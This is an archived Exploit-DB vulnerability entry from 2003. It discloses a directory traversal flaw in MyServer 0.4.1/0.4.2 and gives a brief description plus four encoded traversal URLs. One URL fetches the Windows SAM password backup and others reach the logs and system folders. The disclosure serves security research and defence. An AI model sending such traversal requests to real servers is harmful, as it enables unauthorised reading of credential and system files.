MyServer 0.4.1/0.4.2 HTTP Server Directory Traversal Vulnerability

2003-06-17T00:00:00
ID EDB-ID:22785
Type exploitdb
Reporter Ziv Kamir
Modified 2003-06-17T00:00:00

Description

MyServer 0.4.1/0.4.2 HTTP Server Directory Traversal Vulnerability. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/7944/info

The MyServer HTTP server is prone to a file disclosure vulnerability. Encoded directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result.

http://www.example.com/%2e%2e/%2e%2e/%2e%2e
http://www.example.com/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._
http://www.example.com/%2e%2e/logs
http://www.example.com/%2e%2e/system